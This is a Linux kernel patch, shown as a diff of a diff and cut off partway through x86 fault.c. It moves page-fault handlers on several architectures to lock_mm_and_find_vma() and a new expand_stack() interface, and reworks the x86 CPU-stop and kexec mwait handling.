+diff --git a/arch/parisc/mm/fault.c b/arch/parisc/mm/fault.c
+index 869204e97ec9d..b00aa98b582c2 100644
+--- a/arch/parisc/mm/fault.c
++++ b/arch/parisc/mm/fault.c
+@@ -288,15 +288,19 @@ void do_page_fault(struct pt_regs *regs, unsigned long code,
+ retry:
+ 	mmap_read_lock(mm);
+ 	vma = find_vma_prev(mm, address, &prev_vma);
+-	if (!vma || address < vma->vm_start)
+-		goto check_expansion;
++	if (!vma || address < vma->vm_start) {
++		if (!prev_vma || !(prev_vma->vm_flags & VM_GROWSUP))
++			goto bad_area;
++		vma = expand_stack(mm, address);
++		if (!vma)
++			goto bad_area_nosemaphore;
++	}
++
+ /*
+  * Ok, we have a good vm_area for this memory access. We still need to
+  * check the access permissions.
+  */
+ 
+-good_area:
+-
+ 	if ((vma->vm_flags & acc_type) != acc_type)
+ 		goto bad_area;
+ 
+@@ -342,17 +346,13 @@ good_area:
+ 	mmap_read_unlock(mm);
+ 	return;
+ 
+-check_expansion:
+-	vma = prev_vma;
+-	if (vma && (expand_stack(vma, address) == 0))
+-		goto good_area;
+-
+ /*
+  * Something tried to access memory that isn't in our memory map..
+  */
+ bad_area:
+ 	mmap_read_unlock(mm);
+ 
++bad_area_nosemaphore:
+ 	if (user_mode(regs)) {
+ 		int signo, si_code;
+ 
+@@ -444,7 +444,7 @@ handle_nadtlb_fault(struct pt_regs *regs)
+ {
+ 	unsigned long insn = regs->iir;
+ 	int breg, treg, xreg, val = 0;
+-	struct vm_area_struct *vma, *prev_vma;
++	struct vm_area_struct *vma;
+ 	struct task_struct *tsk;
+ 	struct mm_struct *mm;
+ 	unsigned long address;
+@@ -480,7 +480,7 @@ handle_nadtlb_fault(struct pt_regs *regs)
+ 				/* Search for VMA */
+ 				address = regs->ior;
+ 				mmap_read_lock(mm);
+-				vma = find_vma_prev(mm, address, &prev_vma);
++				vma = vma_lookup(mm, address);
+ 				mmap_read_unlock(mm);
+ 
+ 				/*
+@@ -489,7 +489,6 @@ handle_nadtlb_fault(struct pt_regs *regs)
+ 				 */
+ 				acc_type = (insn & 0x40) ? VM_WRITE : VM_READ;
+ 				if (vma
+-				    && address >= vma->vm_start
+ 				    && (vma->vm_flags & acc_type) == acc_type)
+ 					val = 1;
+ 			}
+diff --git a/arch/powerpc/Kconfig b/arch/powerpc/Kconfig
+index 2b1141645d9e1..6050e6e10d321 100644
+--- a/arch/powerpc/Kconfig
++++ b/arch/powerpc/Kconfig
+@@ -257,6 +257,7 @@ config PPC
+ 	select IRQ_DOMAIN
+ 	select IRQ_FORCED_THREADING
+ 	select KASAN_VMALLOC			if KASAN && MODULES
++	select LOCK_MM_AND_FIND_VMA
+ 	select MMU_GATHER_PAGE_SIZE
+ 	select MMU_GATHER_RCU_TABLE_FREE
+ 	select MMU_GATHER_MERGE_VMAS
+diff --git a/arch/powerpc/mm/copro_fault.c b/arch/powerpc/mm/copro_fault.c
+index 7c507fb48182b..f49fd873df8da 100644
+--- a/arch/powerpc/mm/copro_fault.c
++++ b/arch/powerpc/mm/copro_fault.c
+@@ -33,19 +33,11 @@ int copro_handle_mm_fault(struct mm_struct *mm, unsigned long ea,
+ 	if (mm->pgd == NULL)
+ 		return -EFAULT;
+ 
+-	mmap_read_lock(mm);
+-	ret = -EFAULT;
+-	vma = find_vma(mm, ea);
++	vma = lock_mm_and_find_vma(mm, ea, NULL);
+ 	if (!vma)
+-		goto out_unlock;
+-
+-	if (ea < vma->vm_start) {
+-		if (!(vma->vm_flags & VM_GROWSDOWN))
+-			goto out_unlock;
+-		if (expand_stack(vma, ea))
+-			goto out_unlock;
+-	}
++		return -EFAULT;
+ 
++	ret = -EFAULT;
+ 	is_write = dsisr & DSISR_ISSTORE;
+ 	if (is_write) {
+ 		if (!(vma->vm_flags & VM_WRITE))
+diff --git a/arch/powerpc/mm/fault.c b/arch/powerpc/mm/fault.c
+index af46aa88422bf..644e4ec6ce99d 100644
+--- a/arch/powerpc/mm/fault.c
++++ b/arch/powerpc/mm/fault.c
+@@ -84,11 +84,6 @@ static int __bad_area(struct pt_regs *regs, unsigned long address, int si_code)
+ 	return __bad_area_nosemaphore(regs, address, si_code);
+ }
+ 
+-static noinline int bad_area(struct pt_regs *regs, unsigned long address)
+-{
+-	return __bad_area(regs, address, SEGV_MAPERR);
+-}
+-
+ static noinline int bad_access_pkey(struct pt_regs *regs, unsigned long address,
+ 				    struct vm_area_struct *vma)
+ {
+@@ -481,40 +476,12 @@ static int ___do_page_fault(struct pt_regs *regs, unsigned long address,
+ 	 * we will deadlock attempting to validate the fault against the
+ 	 * address space.  Luckily the kernel only validly references user
+ 	 * space from well defined areas of code, which are listed in the
+-	 * exceptions table.
+-	 *
+-	 * As the vast majority of faults will be valid we will only perform
+-	 * the source reference check when there is a possibility of a deadlock.
+-	 * Attempt to lock the address space, if we cannot we then validate the
+-	 * source.  If this is invalid we can skip the address space check,
+-	 * thus avoiding the deadlock.
++	 * exceptions table. lock_mm_and_find_vma() handles that logic.
+ 	 */
+-	if (unlikely(!mmap_read_trylock(mm))) {
+-		if (!is_user && !search_exception_tables(regs->nip))
+-			return bad_area_nosemaphore(regs, address);
+-
+ retry:
+-		mmap_read_lock(mm);
+-	} else {
+-		/*
+-		 * The above down_read_trylock() might have succeeded in
+-		 * which case we'll have missed the might_sleep() from
+-		 * down_read():
+-		 */
+-		might_sleep();
+-	}
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (unlikely(!vma))
+-		return bad_area(regs, address);
+-
+-	if (unlikely(vma->vm_start > address)) {
+-		if (unlikely(!(vma->vm_flags & VM_GROWSDOWN)))
+-			return bad_area(regs, address);
+-
+-		if (unlikely(expand_stack(vma, address)))
+-			return bad_area(regs, address);
+-	}
++		return bad_area_nosemaphore(regs, address);
+ 
+ 	if (unlikely(access_pkey_error(is_write, is_exec,
+ 				       (error_code & DSISR_KEYFAULT), vma)))
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index a85bbe28dcf46..6bf8dc0b8f935 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -114,6 +114,7 @@ config RISCV
+ 	select HAVE_RSEQ
+ 	select IRQ_DOMAIN
+ 	select IRQ_FORCED_THREADING
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA if MODULES
+ 	select MODULE_SECTIONS if MODULES
+ 	select OF
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index eb0774d9c03b1..274bc6dd839fa 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -83,13 +83,13 @@ static inline void mm_fault_error(struct pt_regs *regs, unsigned long addr, vm_f
+ 	BUG();
+ }
+ 
+-static inline void bad_area(struct pt_regs *regs, struct mm_struct *mm, int code, unsigned long addr)
++static inline void
++bad_area_nosemaphore(struct pt_regs *regs, int code, unsigned long addr)
+ {
+ 	/*
+ 	 * Something tried to access memory that isn't in our memory map.
+ 	 * Fix it, but check if it's kernel or user first.
+ 	 */
+-	mmap_read_unlock(mm);
+ 	/* User mode accesses just cause a SIGSEGV */
+ 	if (user_mode(regs)) {
+ 		do_trap(regs, SIGSEGV, code, addr);
+@@ -99,6 +99,15 @@ static inline void bad_area(struct pt_regs *regs, struct mm_struct *mm, int code
+ 	no_context(regs, addr);
+ }
+ 
++static inline void
++bad_area(struct pt_regs *regs, struct mm_struct *mm, int code,
++	 unsigned long addr)
++{
++	mmap_read_unlock(mm);
++
++	bad_area_nosemaphore(regs, code, addr);
++}
++
+ static inline void vmalloc_fault(struct pt_regs *regs, int code, unsigned long addr)
+ {
+ 	pgd_t *pgd, *pgd_k;
+@@ -281,23 +290,10 @@ asmlinkage void do_page_fault(struct pt_regs *regs)
+ 	else if (cause == EXC_INST_PAGE_FAULT)
+ 		flags |= FAULT_FLAG_INSTRUCTION;
+ retry:
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, addr);
++	vma = lock_mm_and_find_vma(mm, addr, regs);
+ 	if (unlikely(!vma)) {
+ 		tsk->thread.bad_cause = cause;
+-		bad_area(regs, mm, code, addr);
+-		return;
+-	}
+-	if (likely(vma->vm_start <= addr))
+-		goto good_area;
+-	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
+-		tsk->thread.bad_cause = cause;
+-		bad_area(regs, mm, code, addr);
+-		return;
+-	}
+-	if (unlikely(expand_stack(vma, addr))) {
+-		tsk->thread.bad_cause = cause;
+-		bad_area(regs, mm, code, addr);
++		bad_area_nosemaphore(regs, code, addr);
+ 		return;
+ 	}
+ 
+@@ -305,7 +301,6 @@ retry:
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it.
+ 	 */
+-good_area:
+ 	code = SEGV_ACCERR;
+ 
+ 	if (unlikely(access_error(cause, vma))) {
+diff --git a/arch/s390/mm/fault.c b/arch/s390/mm/fault.c
+index 8e84ed2bb944e..2ab388179833e 100644
+--- a/arch/s390/mm/fault.c
++++ b/arch/s390/mm/fault.c
+@@ -429,8 +429,9 @@ retry:
+ 	if (unlikely(vma->vm_start > address)) {
+ 		if (!(vma->vm_flags & VM_GROWSDOWN))
+ 			goto out_up;
+-		if (expand_stack(vma, address))
+-			goto out_up;
++		vma = expand_stack(mm, address);
++		if (!vma)
++			goto out;
+ 	}
+ 
+ 	/*
+diff --git a/arch/sh/Kconfig b/arch/sh/Kconfig
+index 5f220e903e5ab..8e4d1f757bcc9 100644
+--- a/arch/sh/Kconfig
++++ b/arch/sh/Kconfig
+@@ -56,6 +56,7 @@ config SUPERH
+ 	select HAVE_STACKPROTECTOR
+ 	select HAVE_SYSCALL_TRACEPOINTS
+ 	select IRQ_FORCED_THREADING
++	select LOCK_MM_AND_FIND_VMA
+ 	select MODULES_USE_ELF_RELA
+ 	select NEED_SG_DMA_LENGTH
+ 	select NO_DMA if !MMU && !DMA_COHERENT
+diff --git a/arch/sh/mm/fault.c b/arch/sh/mm/fault.c
+index acd2f5e50bfcd..06e6b49529245 100644
+--- a/arch/sh/mm/fault.c
++++ b/arch/sh/mm/fault.c
+@@ -439,21 +439,9 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs,
+ 	}
+ 
+ retry:
+-	mmap_read_lock(mm);
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (unlikely(!vma)) {
+-		bad_area(regs, error_code, address);
+-		return;
+-	}
+-	if (likely(vma->vm_start <= address))
+-		goto good_area;
+-	if (unlikely(!(vma->vm_flags & VM_GROWSDOWN))) {
+-		bad_area(regs, error_code, address);
+-		return;
+-	}
+-	if (unlikely(expand_stack(vma, address))) {
+-		bad_area(regs, error_code, address);
++		bad_area_nosemaphore(regs, error_code, address);
+ 		return;
+ 	}
+ 
+@@ -461,7 +449,6 @@ retry:
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+ 	 */
+-good_area:
+ 	if (unlikely(access_error(error_code, vma))) {
+ 		bad_area_access_error(regs, error_code, address);
+ 		return;
+diff --git a/arch/sparc/Kconfig b/arch/sparc/Kconfig
+index 84437a4c65454..dbb1760cbe8c9 100644
+--- a/arch/sparc/Kconfig
++++ b/arch/sparc/Kconfig
+@@ -56,6 +56,7 @@ config SPARC32
+ 	select DMA_DIRECT_REMAP
+ 	select GENERIC_ATOMIC64
+ 	select HAVE_UID16
++	select LOCK_MM_AND_FIND_VMA
+ 	select OLD_SIGACTION
+ 	select ZONE_DMA
+ 
+diff --git a/arch/sparc/mm/fault_32.c b/arch/sparc/mm/fault_32.c
+index 91259f291c540..56eb40d385a82 100644
+--- a/arch/sparc/mm/fault_32.c
++++ b/arch/sparc/mm/fault_32.c
+@@ -143,28 +143,19 @@ asmlinkage void do_sparc_fault(struct pt_regs *regs, int text_fault, int write,
+ 	if (pagefault_disabled() || !mm)
+ 		goto no_context;
+ 
++	if (!from_user && address >= PAGE_OFFSET)
++		goto no_context;
++
+ 	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
+ 
+ retry:
+-	mmap_read_lock(mm);
+-
+-	if (!from_user && address >= PAGE_OFFSET)
+-		goto bad_area;
+-
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, regs);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++		goto bad_area_nosemaphore;
+ 	/*
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+ 	 */
+-good_area:
+ 	code = SEGV_ACCERR;
+ 	if (write) {
+ 		if (!(vma->vm_flags & VM_WRITE))
+@@ -318,17 +309,9 @@ static void force_user_fault(unsigned long address, int write)
+ 
+ 	code = SEGV_MAPERR;
+ 
+-	mmap_read_lock(mm);
+-	vma = find_vma(mm, address);
++	vma = lock_mm_and_find_vma(mm, address, NULL);
+ 	if (!vma)
+-		goto bad_area;
+-	if (vma->vm_start <= address)
+-		goto good_area;
+-	if (!(vma->vm_flags & VM_GROWSDOWN))
+-		goto bad_area;
+-	if (expand_stack(vma, address))
+-		goto bad_area;
+-good_area:
++		goto bad_area_nosemaphore;
+ 	code = SEGV_ACCERR;
+ 	if (write) {
+ 		if (!(vma->vm_flags & VM_WRITE))
+@@ -347,6 +330,7 @@ good_area:
+ 	return;
+ bad_area:
+ 	mmap_read_unlock(mm);
++bad_area_nosemaphore:
+ 	__do_fault_siginfo(code, SIGSEGV, tsk->thread.kregs, address);
+ 	return;
+ 
+diff --git a/arch/sparc/mm/fault_64.c b/arch/sparc/mm/fault_64.c
+index 4acc12eafbf54..df685a2418550 100644
+--- a/arch/sparc/mm/fault_64.c
++++ b/arch/sparc/mm/fault_64.c
+@@ -383,8 +383,9 @@ continue_fault:
+ 				goto bad_area;
+ 		}
+ 	}
+-	if (expand_stack(vma, address))
+-		goto bad_area;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto bad_area_nosemaphore;
+ 	/*
+ 	 * Ok, we have a good vm_area for this memory access, so
+ 	 * we can handle it..
+@@ -482,8 +483,9 @@ exit_exception:
+ 	 * Fix it, but check if it's kernel or user first..
+ 	 */
+ bad_area:
+-	insn = get_fault_insn(regs, insn);
+ 	mmap_read_unlock(mm);
++bad_area_nosemaphore:
++	insn = get_fault_insn(regs, insn);
+ 
+ handle_kernel_fault:
+ 	do_kernel_fault(regs, si_code, fault_code, insn, address);
+diff --git a/arch/um/kernel/trap.c b/arch/um/kernel/trap.c
+index d3ce21c4ca32a..6d8ae86ae978f 100644
+--- a/arch/um/kernel/trap.c
++++ b/arch/um/kernel/trap.c
+@@ -47,14 +47,15 @@ retry:
+ 	vma = find_vma(mm, address);
+ 	if (!vma)
+ 		goto out;
+-	else if (vma->vm_start <= address)
++	if (vma->vm_start <= address)
+ 		goto good_area;
+-	else if (!(vma->vm_flags & VM_GROWSDOWN))
++	if (!(vma->vm_flags & VM_GROWSDOWN))
+ 		goto out;
+-	else if (is_user && !ARCH_IS_STACKGROW(address))
+-		goto out;
+-	else if (expand_stack(vma, address))
++	if (is_user && !ARCH_IS_STACKGROW(address))
+ 		goto out;
++	vma = expand_stack(mm, address);
++	if (!vma)
++		goto out_nosemaphore;
+ 
+ good_area:
+ 	*code_out = SEGV_ACCERR;
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index b2c0fce3f257c..b3d5706579d43 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -271,6 +271,7 @@ config X86
+ 	select HAVE_GENERIC_VDSO
+ 	select HOTPLUG_SMT			if SMP
+ 	select IRQ_FORCED_THREADING
++	select LOCK_MM_AND_FIND_VMA
+ 	select NEED_PER_CPU_EMBED_FIRST_CHUNK
+ 	select NEED_PER_CPU_PAGE_FIRST_CHUNK
+ 	select NEED_SG_DMA_LENGTH
+diff --git a/arch/x86/include/asm/cpu.h b/arch/x86/include/asm/cpu.h
+index b472ef76826ad..37639a2d9c34f 100644
+--- a/arch/x86/include/asm/cpu.h
++++ b/arch/x86/include/asm/cpu.h
+@@ -96,4 +96,6 @@ static inline bool intel_cpu_signatures_match(unsigned int s1, unsigned int p1,
+ 
+ extern u64 x86_read_arch_cap_msr(void);
+ 
++extern struct cpumask cpus_stop_mask;
++
+ #endif /* _ASM_X86_CPU_H */
+diff --git a/arch/x86/include/asm/smp.h b/arch/x86/include/asm/smp.h
+index a73bced40e241..b3b34032ef234 100644
+--- a/arch/x86/include/asm/smp.h
++++ b/arch/x86/include/asm/smp.h
+@@ -132,6 +132,8 @@ void wbinvd_on_cpu(int cpu);
+ int wbinvd_on_all_cpus(void);
+ void cond_wakeup_cpu0(void);
+ 
++void smp_kick_mwait_play_dead(void);
++
+ void native_smp_send_reschedule(int cpu);
+ void native_send_call_func_ipi(const struct cpumask *mask);
+ void native_send_call_func_single_ipi(int cpu);
+diff --git a/arch/x86/kernel/cpu/microcode/amd.c b/arch/x86/kernel/cpu/microcode/amd.c
+index 461e45d85add9..9a3092ec9b274 100644
+--- a/arch/x86/kernel/cpu/microcode/amd.c
++++ b/arch/x86/kernel/cpu/microcode/amd.c
+@@ -705,7 +705,7 @@ static enum ucode_state apply_microcode_amd(int cpu)
+ 	rdmsr(MSR_AMD64_PATCH_LEVEL, rev, dummy);
+ 
+ 	/* need to apply patch? */
+-	if (rev >= mc_amd->hdr.patch_id) {
++	if (rev > mc_amd->hdr.patch_id) {
+ 		ret = UCODE_OK;
+ 		goto out;
+ 	}
+diff --git a/arch/x86/kernel/process.c b/arch/x86/kernel/process.c
+index e436c9c1ef3b3..279b5e9be80fc 100644
+--- a/arch/x86/kernel/process.c
++++ b/arch/x86/kernel/process.c
+@@ -744,15 +744,26 @@ bool xen_set_default_idle(void)
+ }
+ #endif
+ 
++struct cpumask cpus_stop_mask;
++
+ void __noreturn stop_this_cpu(void *dummy)
+ {
++	struct cpuinfo_x86 *c = this_cpu_ptr(&cpu_info);
++	unsigned int cpu = smp_processor_id();
++
+ 	local_irq_disable();
++
+ 	/*
+-	 * Remove this CPU:
++	 * Remove this CPU from the online mask and disable it
++	 * unconditionally. This might be redundant in case that the reboot
++	 * vector was handled late and stop_other_cpus() sent an NMI.
++	 *
++	 * According to SDM and APM NMIs can be accepted even after soft
++	 * disabling the local APIC.
+ 	 */
+-	set_cpu_online(smp_processor_id(), false);
++	set_cpu_online(cpu, false);
+ 	disable_local_APIC();
+-	mcheck_cpu_clear(this_cpu_ptr(&cpu_info));
++	mcheck_cpu_clear(c);
+ 
+ 	/*
+ 	 * Use wbinvd on processors that support SME. This provides support
+@@ -766,8 +777,17 @@ void __noreturn stop_this_cpu(void *dummy)
+ 	 * Test the CPUID bit directly because the machine might've cleared
+ 	 * X86_FEATURE_SME due to cmdline options.
+ 	 */
+-	if (cpuid_eax(0x8000001f) & BIT(0))
++	if (c->extended_cpuid_level >= 0x8000001f && (cpuid_eax(0x8000001f) & BIT(0)))
+ 		native_wbinvd();
++
++	/*
++	 * This brings a cache line back and dirties it, but
++	 * native_stop_other_cpus() will overwrite cpus_stop_mask after it
++	 * observed that all CPUs reported stop. This write will invalidate
++	 * the related cache line on this CPU.
++	 */
++	cpumask_clear_cpu(cpu, &cpus_stop_mask);
++
+ 	for (;;) {
+ 		/*
+ 		 * Use native_halt() so that memory contents don't change
+diff --git a/arch/x86/kernel/smp.c b/arch/x86/kernel/smp.c
+index 375b33ecafa27..174d6232b87fd 100644
+--- a/arch/x86/kernel/smp.c
++++ b/arch/x86/kernel/smp.c
+@@ -21,12 +21,14 @@
+ #include <linux/interrupt.h>
+ #include <linux/cpu.h>
+ #include <linux/gfp.h>
++#include <linux/kexec.h>
+ 
+ #include <asm/mtrr.h>
+ #include <asm/tlbflush.h>
+ #include <asm/mmu_context.h>
+ #include <asm/proto.h>
+ #include <asm/apic.h>
++#include <asm/cpu.h>
+ #include <asm/idtentry.h>
+ #include <asm/nmi.h>
+ #include <asm/mce.h>
+@@ -146,34 +148,47 @@ static int register_stop_handler(void)
+ 
+ static void native_stop_other_cpus(int wait)
+ {
+-	unsigned long flags;
+-	unsigned long timeout;
++	unsigned int cpu = smp_processor_id();
++	unsigned long flags, timeout;
+ 
+ 	if (reboot_force)
+ 		return;
+ 
+-	/*
+-	 * Use an own vector here because smp_call_function
+-	 * does lots of things not suitable in a panic situation.
+-	 */
++	/* Only proceed if this is the first CPU to reach this code */
++	if (atomic_cmpxchg(&stopping_cpu, -1, cpu) != -1)
++		return;
++
++	/* For kexec, ensure that offline CPUs are out of MWAIT and in HLT */
++	if (kexec_in_progress)
++		smp_kick_mwait_play_dead();
+ 
+ 	/*
+-	 * We start by using the REBOOT_VECTOR irq.
+-	 * The irq is treated as a sync point to allow critical
+-	 * regions of code on other cpus to release their spin locks
+-	 * and re-enable irqs.  Jumping straight to an NMI might
+-	 * accidentally cause deadlocks with further shutdown/panic
+-	 * code.  By syncing, we give the cpus up to one second to
+-	 * finish their work before we force them off with the NMI.
++	 * 1) Send an IPI on the reboot vector to all other CPUs.
++	 *
++	 *    The other CPUs should react on it after leaving critical
++	 *    sections and re-enabling interrupts. They might still hold
++	 *    locks, but there is nothing which can be done about that.
++	 *
++	 * 2) Wait for all other CPUs to report that they reached the
++	 *    HLT loop in stop_this_cpu()
++	 *
++	 * 3) If #2 timed out send an NMI to the CPUs which did not
++	 *    yet report
++	 *
++	 * 4) Wait for all other CPUs to report that they reached the
++	 *    HLT loop in stop_this_cpu()
++	 *
++	 * #3 can obviously race against a CPU reaching the HLT loop late.
++	 * That CPU will have reported already and the "have all CPUs
++	 * reached HLT" condition will be true despite the fact that the
++	 * other CPU is still handling the NMI. Again, there is no
++	 * protection against that as "disabled" APICs still respond to
++	 * NMIs.
+ 	 */
+-	if (num_online_cpus() > 1) {
+-		/* did someone beat us here? */
+-		if (atomic_cmpxchg(&stopping_cpu, -1, safe_smp_processor_id()) != -1)
+-			return;
+-
+-		/* sync above data before sending IRQ */
+-		wmb();
++	cpumask_copy(&cpus_stop_mask, cpu_online_mask);
++	cpumask_clear_cpu(cpu, &cpus_stop_mask);
+ 
++	if (!cpumask_empty(&cpus_stop_mask)) {
+ 		apic_send_IPI_allbutself(REBOOT_VECTOR);
+ 
+ 		/*
+@@ -183,24 +198,22 @@ static void native_stop_other_cpus(int wait)
+ 		 * CPUs reach shutdown state.
+ 		 */
+ 		timeout = USEC_PER_SEC;
+-		while (num_online_cpus() > 1 && timeout--)
++		while (!cpumask_empty(&cpus_stop_mask) && timeout--)
+ 			udelay(1);
+ 	}
+ 
+ 	/* if the REBOOT_VECTOR didn't work, try with the NMI */
+-	if (num_online_cpus() > 1) {
++	if (!cpumask_empty(&cpus_stop_mask)) {
+ 		/*
+ 		 * If NMI IPI is enabled, try to register the stop handler
+ 		 * and send the IPI. In any case try to wait for the other
+ 		 * CPUs to stop.
+ 		 */
+ 		if (!smp_no_nmi_ipi && !register_stop_handler()) {
+-			/* Sync above data before sending IRQ */
+-			wmb();
+-
+ 			pr_emerg("Shutting down cpus with NMI\n");
+ 
+-			apic_send_IPI_allbutself(NMI_VECTOR);
++			for_each_cpu(cpu, &cpus_stop_mask)
++				apic->send_IPI(cpu, NMI_VECTOR);
+ 		}
+ 		/*
+ 		 * Don't wait longer than 10 ms if the caller didn't
+@@ -208,7 +221,7 @@ static void native_stop_other_cpus(int wait)
+ 		 * one or more CPUs do not reach shutdown state.
+ 		 */
+ 		timeout = USEC_PER_MSEC * 10;
+-		while (num_online_cpus() > 1 && (wait || timeout--))
++		while (!cpumask_empty(&cpus_stop_mask) && (wait || timeout--))
+ 			udelay(1);
+ 	}
+ 
+@@ -216,6 +229,12 @@ static void native_stop_other_cpus(int wait)
+ 	disable_local_APIC();
+ 	mcheck_cpu_clear(this_cpu_ptr(&cpu_info));
+ 	local_irq_restore(flags);
++
++	/*
++	 * Ensure that the cpus_stop_mask cache lines are invalidated on
++	 * the other CPUs. See comment vs. SME in stop_this_cpu().
++	 */
++	cpumask_clear(&cpus_stop_mask);
+ }
+ 
+ /*
+diff --git a/arch/x86/kernel/smpboot.c b/arch/x86/kernel/smpboot.c
+index 3f3ea0287f694..f32ee967414e6 100644
+--- a/arch/x86/kernel/smpboot.c
++++ b/arch/x86/kernel/smpboot.c
+@@ -53,6 +53,7 @@
+ #include <linux/tboot.h>
+ #include <linux/gfp.h>
+ #include <linux/cpuidle.h>
++#include <linux/kexec.h>
+ #include <linux/numa.h>
+ #include <linux/pgtable.h>
+ #include <linux/overflow.h>
+@@ -99,6 +100,20 @@ EXPORT_PER_CPU_SYMBOL(cpu_die_map);
+ DEFINE_PER_CPU_READ_MOSTLY(struct cpuinfo_x86, cpu_info);
+ EXPORT_PER_CPU_SYMBOL(cpu_info);
+ 
++struct mwait_cpu_dead {
++	unsigned int	control;
++	unsigned int	status;
++};
++
++#define CPUDEAD_MWAIT_WAIT	0xDEADBEEF
++#define CPUDEAD_MWAIT_KEXEC_HLT	0x4A17DEAD
++
++/*
++ * Cache line aligned data for mwait_play_dead(). Separate on purpose so
++ * that it's unlikely to be touched by other CPUs.
++ */
++static DEFINE_PER_CPU_ALIGNED(struct mwait_cpu_dead, mwait_cpu_dead);
++
+ /* Logical package management. We might want to allocate that dynamically */
+ unsigned int __max_logical_packages __read_mostly;
+ EXPORT_SYMBOL(__max_logical_packages);
+@@ -155,6 +170,10 @@ static void smp_callin(void)
+ {
+ 	int cpuid;
+ 
++	/* Mop up eventual mwait_play_dead() wreckage */
++	this_cpu_write(mwait_cpu_dead.status, 0);
++	this_cpu_write(mwait_cpu_dead.control, 0);
++
+ 	/*
+ 	 * If waken up by an INIT in an 82489DX configuration
+ 	 * cpu_callout_mask guarantees we don't get here before
+@@ -1746,10 +1765,10 @@ EXPORT_SYMBOL_GPL(cond_wakeup_cpu0);
+  */
+ static inline void mwait_play_dead(void)
+ {
++	struct mwait_cpu_dead *md = this_cpu_ptr(&mwait_cpu_dead);
+ 	unsigned int eax, ebx, ecx, edx;
+ 	unsigned int highest_cstate = 0;
+ 	unsigned int highest_subcstate = 0;
+-	void *mwait_ptr;
+ 	int i;
+ 
+ 	if (boot_cpu_data.x86_vendor == X86_VENDOR_AMD ||
+@@ -1784,12 +1803,9 @@ static inline void mwait_play_dead(void)
+ 			(highest_subcstate - 1);
+ 	}
+ 
+-	/*
+-	 * This should be a memory location in a cache line which is
+-	 * unlikely to be touched by other processors.  The actual
+-	 * content is immaterial as it is not actually modified in any way.
+-	 */
+-	mwait_ptr = &current_thread_info()->flags;
++	/* Set up state for the kexec() hack below */
++	md->status = CPUDEAD_MWAIT_WAIT;
++	md->control = CPUDEAD_MWAIT_WAIT;
+ 
+ 	wbinvd();
+ 
+@@ -1802,16 +1818,63 @@ static inline void mwait_play_dead(void)
+ 		 * case where we return around the loop.
+ 		 */
+ 		mb();
+-		clflush(mwait_ptr);
++		clflush(md);
+ 		mb();
+-		__monitor(mwait_ptr, 0, 0);
++		__monitor(md, 0, 0);
+ 		mb();
+ 		__mwait(eax, 0);
+ 
++		if (READ_ONCE(md->control) == CPUDEAD_MWAIT_KEXEC_HLT) {
++			/*
++			 * Kexec is about to happen. Don't go back into mwait() as
++			 * the kexec kernel might overwrite text and data including
++			 * page tables and stack. So mwait() would resume when the
++			 * monitor cache line is written to and then the CPU goes
++			 * south due to overwritten text, page tables and stack.
++			 *
++			 * Note: This does _NOT_ protect against a stray MCE, NMI,
++			 * SMI. They will resume execution at the instruction
++			 * following the HLT instruction and run into the problem
++			 * which this is trying to prevent.
++			 */
++			WRITE_ONCE(md->status, CPUDEAD_MWAIT_KEXEC_HLT);
++			while(1)
++				native_halt();
++		}
++
+ 		cond_wakeup_cpu0();
+ 	}
+ }
+ 
++/*
++ * Kick all "offline" CPUs out of mwait on kexec(). See comment in
++ * mwait_play_dead().
++ */
++void smp_kick_mwait_play_dead(void)
++{
++	u32 newstate = CPUDEAD_MWAIT_KEXEC_HLT;
++	struct mwait_cpu_dead *md;
++	unsigned int cpu, i;
++
++	for_each_cpu_andnot(cpu, cpu_present_mask, cpu_online_mask) {
++		md = per_cpu_ptr(&mwait_cpu_dead, cpu);
++
++		/* Does it sit in mwait_play_dead() ? */
++		if (READ_ONCE(md->status) != CPUDEAD_MWAIT_WAIT)
++			continue;
++
++		/* Wait up to 5ms */
++		for (i = 0; READ_ONCE(md->status) != newstate && i < 1000; i++) {
++			/* Bring it out of mwait */
++			WRITE_ONCE(md->control, newstate);
++			udelay(5);
++		}
++
++		if (READ_ONCE(md->status) != newstate)
++			pr_err_once("CPU%u is stuck in mwait_play_dead()\n", cpu);
++	}
++}
++
+ void hlt_play_dead(void)
+ {
+ 	if (__this_cpu_read(cpu_info.x86) >= 4)
+diff --git a/arch/x86/mm/fault.c b/arch/x86/mm/fault.c
+index 7b0d4ab894c8b..1dbbad73192a1 100644
+--- a/arch/x86/mm/fault.c
++++ b/arch/x86/mm/fault.c
+@@ -900,12 +900,6 @@ __bad_area(struct pt_regs *regs, unsigned long error_code,
+ 	__bad_area_nosemaphore(regs, error_code, address, pkey, si_code);
+ }
+ 
+-static noinline void
+-bad_area(struct pt_regs *regs, unsigned long error_code, unsigned long address)
+-{
+-	__bad_area(regs, error_code, address, 0, SEGV_MAPERR);
+-}
+-
+ static inline bool bad_area_access_from_pkeys(unsigned long error_code,
+ 		struct vm_area_struct *vma)
+ {
+@@ -1354,51 +1348,10 @@ void do_user_addr_fault(struct pt_regs *regs,
+ 	}
+ #endif
+ 
+-	/*
+-	 * Kernel-mode access to the user address space should only occur
